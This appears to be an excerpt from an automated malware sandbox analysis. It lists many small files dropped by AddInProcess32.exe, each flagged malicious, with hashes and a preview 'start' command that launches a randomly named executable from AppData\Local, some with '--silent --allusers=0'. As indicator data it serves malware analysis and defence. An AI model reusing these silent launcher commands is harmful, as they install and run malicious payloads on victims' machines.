                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\LuXFYkxCqJv6U5aGsy6shXnX.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.831148145366319
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J52NMZ89otVF:fE1sZ232689otVF
                                                                                                                                                                                                                                MD5:3340C44FC628CBFB3A3812AB83E0341D
                                                                                                                                                                                                                                SHA1:98FEDB4AF543797EF2C9394A53165D27C66314AF
                                                                                                                                                                                                                                SHA-256:549A4680478C99B3513120E8A7236756535A8B927E813281F62739599036053F
                                                                                                                                                                                                                                SHA-512:9DBF4C70227E55BCDA96DD63EA7D7AF65897CD149144C830FA25F7DC7E5C92C8AAF2EB5636664A0146926BBED51BD2AEFC2C8E311AC29C97573135833A6B3541
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\ShiCqBALVwHXuLXc8u9Hf2su.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.965135283016123
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5v1ENANU02lL4m:fE1sZ23NIANU02lL
                                                                                                                                                                                                                                MD5:5C18544425456CAC29600E4AF4FEDAC4
                                                                                                                                                                                                                                SHA1:37862979F9C3D19B5F110D168FFA5F315CCB05B1
                                                                                                                                                                                                                                SHA-256:AEF088CB3471333637030984B6C9CEB7CBA5D90A96C1BAEFD4972DB397197F86
                                                                                                                                                                                                                                SHA-512:CD59F53FA3EAE0B9BAEA4EBEAF66DF8687384ECA873A8D75E3B948598F3700D0D8672A9916C64588DB83293942CB9F72466641203CC9102A038E9CA03177A085
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\JMNwDYLRHcfb7Lck3bh1QS4f.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.976075681598202
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5qvogcSStKQ:fE1sZ23qFQ
                                                                                                                                                                                                                                MD5:29E51100D82A5F2F7CF3A51D1302268B
                                                                                                                                                                                                                                SHA1:EF0405F1175CF04A4927FB194D91E75E6A41F860
                                                                                                                                                                                                                                SHA-256:00E5EFA1B221DF11A02CFBFE768FD9B107DE1B4E1C1BE00CEDC752CE93FAE54E
                                                                                                                                                                                                                                SHA-512:816DB6A399E4A532F43231C7ADB4F63EC7CE5C30DBEFFAAA351BC1FCD12630758A9305E5CBCDE2A23C05DACAD29B4C3B038D53674540CE54BE9C62D441DB7AD0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\OFQ7ZJkbPO93pwjUuJw87q34.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.005061188844578
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5dW2NyRwlp4Ln:fE1sZ23R1lp8
                                                                                                                                                                                                                                MD5:C8354EF8FC24B3340BFF3A166B76D40F
                                                                                                                                                                                                                                SHA1:8461BB364E3DBD652A2CAE8EACA45A35A5784FDB
SHA-256:41901B2EDC46ABAFF6022FBB8D4D51067BB5512E9535E3B105C3798B7018749B
SHA-512:2DAF6AB49B7ED777ECDEDF57E55B1AD8C49D0D72545D40018EE664D0560D3C991AAF6A9C3914329D240A801381FE1B80A5BCBF0ACE26ED8D7EF22C87444C0245
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\x3HF5f4W7zVGUR0m1DVxQqdq.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.688608971980529
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5REOXKmLJJgTqJln:fE1sZ2376mLATqJl
MD5:807EB670A7AE325E9561917101FC07F1
SHA1:1D4B61B353D373EAFFFB78E1D4754850F052814A
SHA-256:DEFA34C3F4B6056DBAA39D2A5565D28EAD68076442EB658F905B76A4431A0CFF
SHA-512:7585F93CB00D11E9CCDB92CB0A965D8B97BB7AFDE70DE25268A1C1D725419F4FF4D7E80188EDF1F1D44A6637E883381245B1E4632758827C4638016C505C8D50
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\4atMces8tYoo96OnbLT8HE6O.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):5.005061188844578
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5c5MjAJ8C6VF:fE1sZ23cSjdF
MD5:569A6D9EA000B21354CEB1BB7941A5A5
SHA1:3A79E9C4E9AF3C3B7E1187D6232783E6F1B44831
SHA-256:A5E9958EA3F0AAF70CC0B29708DF92EDEFDAC61779EC71C2EC4E6E61F5AC2B3E
SHA-512:43530FAE0D09230C5F1F981EAF3E9784182F28D1AD5F531B7BD338F2399BA96360FCD3D533293FE9E881588669A9D991D9DEF1B2BE9E9CED42F8C845D16253AE
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\y1mf9KikiO68brzuQYIFxwgi.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.83680552979477
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5vxw7/A1zxiF:fE1sZ23JwjQzQF
MD5:23AC28EDE319FC47FEAC4B44689CF92C
SHA1:A25CB7627583F7EE12724E1833D025445AF15ADC
SHA-256:740D89CC70166C82C38038BEAE38AE4DA6F702E1C05D160FEA97A78295AD3387
SHA-512:3575313B2161D138BAC4BB03F74E5CF731EDF0A465066CA1596F3875EB71FE0ED164CA78CA2FC5F48D27F48524C065FE9A026CA8F301168BE3D34B1F89658298
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\JUzoV9GxBJCDHhTcPnbRBLla.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.955976812787872
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5qNpNVCv:fE1sZ23q5Ev
MD5:7BD9ED707A74644111C6A28F1A692906
SHA1:875364DCBF7A2A31D1D2DFBC50A4A308112CE723
SHA-256:04B5781771AD9A6528E7D4E54EFF5773218A2BCF77AC42EE121F21ACD99700A7
SHA-512:49D832CBB68F33EAF6D91384941C9AB074B3CF41C7E16E85FE10B96E86B97F090138A8B44A5551128DC42EE47965D8066C3EAD7B6B0CD4DE972754832CC8128C
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\OVzuyLkGPqt0m8hgNA0UwSGi.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.871074051194774
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5/fuzJsJPA8HFn:fE1sZ2338JsJP9
MD5:3EB1017E5F140F24233BD3D59E6DDDA5
SHA1:FE24EFA41F73E4A6E738E5D3DB83CAFCC064572F
SHA-256:A09C33E413AAFE2DE86CFB4C0ED45252368641257D918465CACF319B38CA6F11
SHA-512:DE217E707565DF077C5C3D26B05ACFEE2AD517A3E9F89589DFCB7ECE2718E5DCBCB5B84E859D87F7195D0CF4B4B629A3EDE5DA8A8E4E63322033EA009ABB3363
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\ZHH3BNVA85IlSTeCpiV3Sgqb.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.860133652612695
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5rRD9YE+LHv:fE1sZ23NhYxLHv
MD5:0A136C49FF8363EA6D8BB9AC524D5E74
SHA1:5E7FCDAC139922A48B51FAA90812F40DFF0866A8
SHA-256:C6C2D9CA965348865A0C7F760862B0EDCD099619B963E8BB555AF54563C74F5E
SHA-512:6F7852E84B1E43ACC759C8227C3E8AD18633489D5DE4005CCDAEB0542942C66C0A16798BFD15D798C4570082130DFD505588173F34FC828E26794862F6C0E19D
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\NdBfL9GQKAuQALK03ZlcLnBv.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):5.01690789206074
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5siAwCky4/kdan:fE1sZ23sDp4/D
MD5:78263AC5C4FE433FA33D72CE63AB6BED
SHA1:1B4AD3460224373C3AEC61517E534951956CE667
SHA-256:CA89DFBFE1003CFFA5FE89424E8BEA29026B47DAE3151AA96ACB91A5929E2087
SHA-512:EC3227BDFACFE5006FCB3C679D29421850929A39899B9250F1E65EBAF7A652FC042D3E41F256C38CC99DA49C260107410FE3BD870CA8EF9060079BAAC179990C
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\IiFh1rXOMpGB7BnxmUig3wkQ.exe" --silent --allusers=0

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.932648689969946
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5RQn1QwURHHF:fE1sZ23S1QRnF
MD5:ED7D69AF69E55F4238F716046B39CD81
SHA1:0FF7DFD72F1B74BF93450718A005506F7529BE83
SHA-256:794F557A82D3FB26B510AE3B09C0F3D4EB7C4C92A44DE3EE58F157F7DAC18516
SHA-512:817E3B20287A3042F78BCFD750FC42CA0056B8B8DB3CE1EC6FB88603FCAAF1EB43E129CACD34FD0B275F070E2F4FED23CF1E05A1AF054C83FCD982BC143CCDB8
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\t5dER7PVcN8YbrHzsawB4xKm.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.720863500809264
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5DUcGttp9Qn:fE1sZ23h3
MD5:7DD14739F1A013AAE29B899AD3B17BCB
SHA1:5554E40D057BE3E1A4073505A4279E35EEB1359B
SHA-256:665AE94FC31D915EDA06EDA06B81A639478A7CFC25E2704E024710FF279F612A
SHA-512:DAC6888D84BE8FAA51BFD0DC3E28DACBDC86403FA9D663688A2666BF27359FC4796E8455BABFD33E3DED3D6F02CA1414F41E1C51169BBD5F1EA2D2ADD911C1B5
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\f1yTeHrlUuYsPLKRUrl6KMpe.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.811655711048255
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5WEk75R3C5L:fE1sZ23WEiY5L
                                                                                                                                                                                                                                MD5:443B1B03844CF79C8D7D79EA67EE106E
                                                                                                                                                                                                                                SHA1:B2522D45E0AEFB71AA41CE9FC81C653CB3C59BF3
                                                                                                                                                                                                                                SHA-256:658997BCFFDFAB91AD0046AAFE5CE122831664B040488E507D3B1AA2F6F69D6E
                                                                                                                                                                                                                                SHA-512:62305015A5AC9CF10DF446C6FEB2E7CE204733CEF586C66E37DC5D4F61B0A9A5B829F2A057B41F4D1274A876FBE3C07AB84DFF001557067D1F0E1BD21E511DEB
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\saftSBfOyQtbUhRB42BwTwJm.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.016001587426657
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5VyovQ70SELv:fE1sZ233Q70ZLv
                                                                                                                                                                                                                                MD5:BC9E85E9B05F45F5ADE68D9FE7EB3192
                                                                                                                                                                                                                                SHA1:5C6E6D9686B7F62DC2E1A4E79BF6A949DB1B0400
                                                                                                                                                                                                                                SHA-256:33B15249065A6AFBCD9851AEF2B0DC4534D774237212B33EAB22F9916DBC509C
                                                                                                                                                                                                                                SHA-512:840F0A4D0835D14C61C856FDF58662053ED19C57C90B47103FB1A520D40A3D3A3AB7C6476059FA511124E04820AA3B592014A5CAE3307492E4191BF6D618852E
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\0WEfXyMPJw5gbxAkYoQ7foIu.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.958030572933905
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5Vt7Uv8TJBKLn:fE1sZ23H7UKS
                                                                                                                                                                                                                                MD5:36A322B162400A7C9C86FE923FF43796
                                                                                                                                                                                                                                SHA1:1E2B876CBF7781DBA634B0BC9DA5A38C93B1C9FD
                                                                                                                                                                                                                                SHA-256:BBA50501792239DB14F7045006D69A852ED6EA59C8DB819C5BF33FE159005A42
                                                                                                                                                                                                                                SHA-512:EB23E894CE9BC54FDDE3762FD7D844F0DC3167F3921111B4750D9C2D2A6541416BD91423E49A58B8B9FA82E921FF52142C5949EE04FEB6794A71053613B0E6FF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\pHBfSuis1Xhkv6ZdHJOyObLb.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.784491899730469
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5cRMkjaiv:fE1sZ23cNxv
                                                                                                                                                                                                                                MD5:08B79590BD624F9ED07D3D2A7A54AD99
                                                                                                                                                                                                                                SHA1:6DE1BE3DFD9B0DAD975FCA9F57CDA97E585DC289
                                                                                                                                                                                                                                SHA-256:18507EB5A22B918D68024D664DA48324587A8C84567ACDE1D78EE3B59BAF0D47
                                                                                                                                                                                                                                SHA-512:9A215C32DDF8319418C52E2BB1D37DAAB8780CDCD77B8B8F9C5BA6FFA609E48561E8BDDFA43093976B2D610CCCB18A7E21B6DE5B55942699C90F3DB30EF0AA07
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\y6XaweA6d3ukZLoFeklnZ9Wr.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.887065399713038
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J52oNEiA1KTCVF:fE1sZ232o6xATCVF
                                                                                                                                                                                                                                MD5:3D024EBBAAFB2E1C18FA955E422564F4
                                                                                                                                                                                                                                SHA1:DFFE48FBD0E1D21CDF3FAB4563E1EDA7F4AC21FA
                                                                                                                                                                                                                                SHA-256:FF2261CC379F32830374773BAA8B836881F30D3CCD5E6C4B19E1EBA26DF27FA4
                                                                                                                                                                                                                                SHA-512:7D8D4E04C6296721DCDCD8A7B86A382CA04D788BA9BF32250DFA48679E71616887BE3B1E69D24EB786A2143870A2717FCDF60FB058A65C11645FF55024A42D12
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\S0j14drhBOZGdsEYt1IovCSw.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.871074051194775
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5jkQJmmHF:fE1sZ23pmmHF
                                                                                                                                                                                                                                MD5:2B4801E7D6266824E739321F20359D48
                                                                                                                                                                                                                                SHA1:F0D05E24BE45FA319A8ED56112E02BCA2C645DCE
                                                                                                                                                                                                                                SHA-256:7C718F092A718D071128E31F838D28F6E2E814AF3D206C405616B323B90F6904
                                                                                                                                                                                                                                SHA-512:685D4359D7792F67883C859EFC1B19436A796F5429FD37D2A435398608BB4E65B54D026688CB605BF97A294DE7D809BEC44DDB8862C908CB87E7BBCE06648449
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\FQM2AbwszjT1lQzUoXGDxSTy.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.9379317041235735
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5AtjiyJNiNHF:fE1sZ23AtjiyeNHF
                                                                                                                                                                                                                                MD5:3017B9B2EE69659484D77D53044904B7
                                                                                                                                                                                                                                SHA1:CAEB057EC92A8156D82DDAB5F5F47DDA3C949368
                                                                                                                                                                                                                                SHA-256:2B2692ADC58E38992B9FE19AA5588E7B86CBE2171F3AE32A1A40ACA28202A581
                                                                                                                                                                                                                                SHA-512:A19AAA16C063ACC1D577C276955D1D0E95158328B57E743F8EA22562EDFA8C02EA5042079E36780D6CA5BE1A1A8E3F98464AFF3718B75DB41B628AB0E0E460B0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\ehuKK8NkGWXoqtsyMQJdZvL3.exe"
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.858686326958929
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1s8pE2J5yWvuAxnPQogm:fE1sZ23yWvuAmY
                                                                                                                                                                                                                                MD5:D3F1833F48C33AD4EE5DB7A8C7CC2552
SHA1:181AE15D291EB3E7D09F1D47A22CB8B6892F4593
SHA-256:6FC55F0BF1DE032FC45C30CE639AB1314129D1FB482A0FB4E01A4BC071BA305C
SHA-512:3FBDCF4763EA917472F8ECBFD5D026FE359E13178A2A968B3FF048A7AA4AF8B6AAE0231AB345375F8C2AAA78A808235794F6B8A003EE5C465150A6152B727769
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\W7lXXTFWXeTByuMsbD5hqZaG.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.871074051194774
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5tTvG2AHFn:fE1sZ23hnm
MD5:0846E474C92A6F1BFF08370797439279
SHA1:E140A3230DD0F10AED5AA750E602A7C99C5CFB14
SHA-256:C313D97AB8F3266F967BC69F6C2AC2E0F7F1500BE1B712754F1E1FFB905D241C
SHA-512:E9BED64CF3F18254E234FF71654654648F02378A8109139409C74DA4AD16DB67826138DD2EA4DFD5399479E660AE702509BD0202066499AB6A2CC2165B642DA7
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\H6XhhPCeuwAb2QQK3C3B1Lwl.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.691877993562888
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5OOWla+18AEAEF:fE1sZ23OOWl3nEVF
MD5:20C3CA2680437DF514B3195114CA1ECB
SHA1:29D132977090F200839D2ED355CBD53B6B0A6FC0
SHA-256:B3A7E100056F2169CCF3C7A7093B027AA30105FF3A6D4FBB8301EE13DD1EF63F
SHA-512:51BA3DF4B8FC846E45F58864B9E8446B587BBD37E60C53E86DA3376BA04912797A9FCFF27B17CACDFDA1DDCAA8E33AE0C226D61A6931A4413E7EE02CAE9DEC4C
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\kkscE0U22us2Ek0MCP4ULYeK.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.8980057982951175
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5dMhkLYi9HxzLVF:fE1sZ23ZYi9Rv
MD5:006B7FE35929594CAC2F5EC800AEAC7D
SHA1:05FEBC65C4304FB21FEFDCD791ED0454A0FBD435
SHA-256:1138D0D279A581F9E3DD367C1D492254996D56CB231D991813C8715882A6A043
SHA-512:07A600A2EAE854E252BDDCF88185B6A99F86EF133000EDB192576B9F14CB88A847F81250D80F43BEB1FE008C7BD9977E4E1F228C882895C6768104E29C1F19DD
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\8iDMf15n1CQluRX22T9R9HtN.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.836805529794771
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5NuMQDXTpydYcdLAdAHFn:fE1sZ23dQle9JAs
MD5:CA4896C7ACD0D21A28826ECCD749FC11
SHA1:9E3AFBCA4F989C3704EFE8FF885431BBE4F5436F
SHA-256:EE57B303306808C44A0784E015E52D57EE607A07199CA2028AD6AD2BBE185058
SHA-512:2DE8361984456D2A402DCAE2C04E1E014EAB77ECC34BA5C0BF3089B699DB1293B9306BCE72C9133A7D0ADEDF2055D3329D9866C28FE6BC0B1C6AD0DB1C119E6B
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\hKiTsf257VLWDEryVqhdGiax.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.742744297973422
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5gHRG+x9TdAtQn:fE1sZ23gY+XH
MD5:99A808F526952ABF825D7317A069B726
SHA1:E2ED0F150842242031C5C1EF6A69443956D1FA64
SHA-256:C2D361E4187587B3027ADAB1E973DD20710F221A288C353D2F01C9301E4DEE55
SHA-512:ACC356685F3C46BD57374507C3C1AA095082AF7D7DC9FE5F83392E5D9EF08F233C9516BB9E2216C1CFC4C883851867E4D2A5619C623C858A04C7CAB78AE967F9
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\EuHyDssPP1nHlUuAX6xe7qHq.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.907164268523369
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5qSXHHMmhSagjHF:fE1sZ23qKHMmhSl
MD5:FBCE133DBE896E56D966171E97875B11
SHA1:610D1B448EB6549D0B0BCB99B8DBFA8C1CBCAC60
SHA-256:AC47D803B4CCA6D85A9A0A471AE73723AD47BDE7481837A09726A1223E49E68D
SHA-512:BDEEF9FE5668F930B3E5AF2E8890D0BB75022EB3DC9BA89BD5B5D5DA700D3C90307A1E11907110DD51B8B398E4F3DE88741B37059A7C75F029583137838E71BB
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\O85XP7ZryV2biCD7WlxJwLlh.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):4.938912891964586
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5VUcGju/ciSkdan:fE1sZ23j0XD
MD5:E512FD029FBA19DBFC1EB74D7CFCD441
SHA1:C8AC8554AAAE0C925A52EAE4670DB55C4AEBC712
SHA-256:270F3EE6593EBF532275D6595E4A15AFF09AB6FCE58A706EC0F96D53516C4E1C
SHA-512:304C63F952CA807AD78D3EA2CA46D233CAA578CD202EFDC2A1CED91D9C3828B91F633CD1B67AED895CC4232887F4F28CF9136E5D4D32990803D019DCB56FF0F7
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\01ySZukOlUcP5NF6FSceJyuX.exe" --silent --allusers=0

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):69
Entropy (8bit):4.8057662624023605
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5wuwsI7dn:fE1sZ23wujI7d
MD5:A48BBC2B83D88366691B35BA3ED0FF0C
SHA1:BC5B72F9928441FC96FFC082BB199325F340ECF9
SHA-256:927FA6FB02E4617B7997015D9CBC1A0BFD9D620C4BC6C7541A92016F5602E468
SHA-512:3956F943378CC17445AA3C0714B3AB39F4BE631EBAA3FE520A161331DABCF055AB067248A2CA340A12935EF480CFA3BD3DCB383D3140CF566CE563DA01A70327
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\UK8ipx6lqPw4aE70mcGL0JtJ.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):90
Entropy (8bit):4.955688169790441
Encrypted:false
SSDEEP:3:Ljn9m1s8pE2J5c081DkYN8PAZlIkdan:fE1sZ23cT1D3NG3D
MD5:DD739AB0A13916C6BEEDD683BAF64BBE
SHA1:91B010255E6E7E02837429C25E2E95B45BE0A4AD
SHA-256:093D9094F47737D9F00CD2EE54D177F9D402D585D284C2813C70A100BEB1D1E3
SHA-512:349B5087710396918384F8C830002D16F6BDB58E0DE71EC64FF74371118CFF1DD2730665DB9982B94C86CE0904AF209E8E7A066E65E2DC095E9F6B42ACC3E1E7
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\9rAJjYr1uJZPfASZhYrXXHW2.exe" --silent --allusers=0

